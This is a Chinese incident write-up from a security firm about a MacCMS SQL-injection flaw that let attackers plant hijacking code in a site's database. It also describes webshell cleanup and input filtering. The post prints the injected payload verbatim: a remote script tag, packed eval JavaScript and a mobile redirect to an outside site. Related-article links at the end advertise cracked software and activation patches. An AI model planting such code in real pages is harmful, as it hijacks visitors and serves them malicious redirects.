2020蘋果maccms最新漏洞補丁 防止資料庫被反覆掛馬
2020年剛開始,蘋果CMS被爆出資料庫程式碼執行漏洞,大量的電影網站被掛馬,尤其電影的頁面被篡改植入了惡意程式碼,資料庫中的VOD表裡的d_name被全部修改,導致網站開啟後直接跳轉到S站或者彈窗廣告,目前該maccms漏洞受影響的蘋果系統版本是V8,V10,很多客戶網站被反覆篡改,很無奈,通過朋友介紹找到我們SINE安全尋求技術上支援,防止網站被掛馬。根據客戶的反應,伺服器採用的是linux centos系統,蘋果CMS版本是最新的V10版本,我們立即成立網站安全應急響應處理,幫助客戶解決網站被攻擊的問題。
首先很多站長以為升級了蘋果CMS官方最新的漏洞補丁就沒問題了,通過我們SINE安全技術對補丁的程式碼安全分析發現,該漏洞補丁對當前的資料庫程式碼執行漏洞是沒有任何效果的,於事無補,網站還會繼續被攻擊。
我們來看下客戶網站目前發生的掛馬問題,開啟網站首頁以及各個電影地址都會被插入掛馬程式碼,如下圖所示:
打包壓縮了一份網站原始碼,以及nginx網站日誌檔案,我們SINE安全工程師在根目錄下發現被上傳了網站webshell木馬檔案,通過網站日誌溯源追蹤我們檢視到訪問這個PHP指令碼木馬檔案的是一個韓國的IP,具體的程式碼如下圖:
程式碼做了加密處理,我們SINE安全對其解密發現該程式碼的功能可以對網站進行上傳,下載,修改程式碼,運算元據庫等功能,屬於PHP大馬的範疇,也叫webshell木馬檔案,我們又對蘋果CMS的原始碼進行了人工安全審計,發現index.php程式碼對搜尋模組上做的一些惡意程式碼過濾檢查存在漏洞,可導致攻擊者繞過安全過濾,直接將SQL插入程式碼執行到資料庫當中去。
我們對資料庫進行安全檢測發現,在VOD表的d_name被批量植入了掛馬程式碼:
<script src=https://www.kilin.xyz/1.js>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(newPRegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('4.5(\'<61="3/2" 7="//0.b.c.d/8.0"><\\/9\'+\'a>\');',14,14,'js|type|javascript|text|document|write|script|src|20487493|scr|ipt|users|51|la'.split('|'),0,{}));var LOUMtBZeW=navigator["userAgent"]["toLowerCase"]()["match"](/(ipod|iphone|ipad|android|coolpad|mmp|smartphone|midp|wap|xoom|symbian|j2me|blackberry|wince)/i)!=null;if(LOUMtBZeW){setTimeout('window.location.href="https://m.qiche-hangjia.com:168/ua80666/"',500)}
這手法很專業,不是一般的攻擊者所為,針對手機端做了跳轉以及隱藏嵌入,讓網站運營者根本無法察覺發現,還判斷了cookies來路,達到條件才能觸發攻擊者植入的廣告程式碼。繼續安全分析與追蹤,發現了攻擊者的手法,POST提交到/index.php?m=vod-search,POST內容是加密的這裡就不方便發出了,屬於漏洞攻擊了,可能會給其他使用蘋果CMS系統的網站造成攻擊,我們SINE安全技術對POST攻擊程式碼進行了解密分析,發現確實是繞過了蘋果官方V8,V10系統的程式碼安全過濾,直接將掛馬程式碼插入到了資料庫裡了。
問題根源找到了,接下來我們對客戶的蘋果CMS漏洞進行修復,對POST提交過來的引數進行嚴格的過濾與轉義,對vod-search含有的惡意字元進行強制轉換,對惡意程式碼進行安全攔截,防止傳入到後端進行資料庫裡的程式碼執行。對網站程式碼裡存在的木馬後門進行了全面的人工審計與檢查,共計發現5個後門,其餘的在快取目錄當中,跟程式程式碼混淆在一起,也都刪除了,對網站的後臺地址進行了更改,之前後臺使用的地址被攻擊者掌握,對管理員的賬號密碼進行了加強,至此蘋果CMS網站被掛馬的問題才得以徹底解決,如果您的maccms也被一直掛馬,自己懂程式碼的話可以對POST到index.php的資料進行安全攔截與檢查,防止惡意程式碼的插入,如果不是太懂的話,建議找專業的 網站安全公司來處理解決。
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/31542418/viewspace-2671576/,如需轉載,請註明出處,否則將追究法律責任。
相關文章
- 寶塔漏洞防禦 防止資料庫被刪的方案資料庫
- 如何防止網站被侵入,如何防止網站被掛馬,如何防止網站被入侵?網站
- 舊版iOS漏洞可能已被利用?蘋果釋出iOS 12.5.4修復補丁iOS蘋果
- 蘋果CMS d_name值漏洞EXP掛馬解決辦法蘋果
- 蘋果Mac電腦ps 2024最新 「Photoshop 2024補丁破解v25.1正式版」蘋果Mac
- 蘋果mac電腦iZotope RX 10 啟用最新版附iZotope RX 10 破解補丁蘋果Mac
- 如何防止網站資料庫被攻擊 被篡改網站資料庫
- oracle最新補丁查詢Oracle
- 最新!Adobe 釋出修復Flash Player關鍵漏洞的安全補丁
- 蘋果Mac電腦版Premiere Pro 2022安裝包附補丁蘋果MacREM
- 中文最新Illustrator 2024啟用補丁
- Weblogic最新補丁在哪裡下載Web
- Oracle 檢查當前資料庫CPU和PSU補丁資訊Oracle資料庫
- 蘋果mac電腦多功能檔案搜尋:HoudahSpot破解中文版+補丁資源蘋果Mac
- 阿里雲Polardb國產資料庫補丁升級 實踐阿里資料庫
- 最新蘋果資訊:蘋果手錶6健康功能顯著提升蘋果
- 資料分析統計推薦:Minitab Express 啟用最新版附補丁Express
- 蘋果釋出補丁修復2018 MacBook Pro過熱降頻問題蘋果Mac
- Nvidia高危GPU漏洞;Win 10最新“996”補丁裝完藍屏;遊戲發售一週被盜版5萬次GPU996遊戲
- 蘋果Mac電腦資料庫管理必備:DBeaverEE免啟用中文版最新蘋果Mac資料庫
- Enfocus PitStop Pro 2022 最新補丁啟用版
- 世界最大漏洞資料庫釋出最新研究報告資料庫
- 蘋果“查詢”功能竟能被用來傳輸任意資料?!蘋果
- 雲伺服器部署的mysql資料庫怎麼防止被“黑”?伺服器MySql資料庫
- 如何徹底擦除資料 防止資料被恢復?
- AutoCAD 2021啟用最新版+AutoCAD 2021補丁
- HoudahSpot 破解補丁最新 HoudahSpot 中文 for Mac安裝教程Mac
- 谷歌披露 微軟 Jet 資料庫引擎 RCE 漏洞,尚未修補谷歌微軟資料庫
- 蘋果和亞馬遜否認被中國微型晶片滲透蘋果亞馬遜晶片
- 微軟漏洞被用於金融欺詐、VMware釋出漏洞補丁|2月16日全球網路安全熱點微軟
- FBI破解iPhone的漏洞被堵了!蘋果說要對抗黑客入侵iPhone蘋果黑客
- 如何防止抓取資料時被列入黑名單?
- MySQL資料庫面試題(2020最新版)MySql資料庫面試題
- Chrome存在高危漏洞!谷歌緊急釋出安全補丁Chrome谷歌
- 2020最新蘋果App真機除錯測試詳細教程蘋果APP除錯
- 12. Oracle版本、補丁及升級——12.2. 補丁及補丁集Oracle
- AutoCAD 2023註冊中文版+最新啟用補丁
- 中文Illustrator 2023破解版最新+ai破解補丁2023AI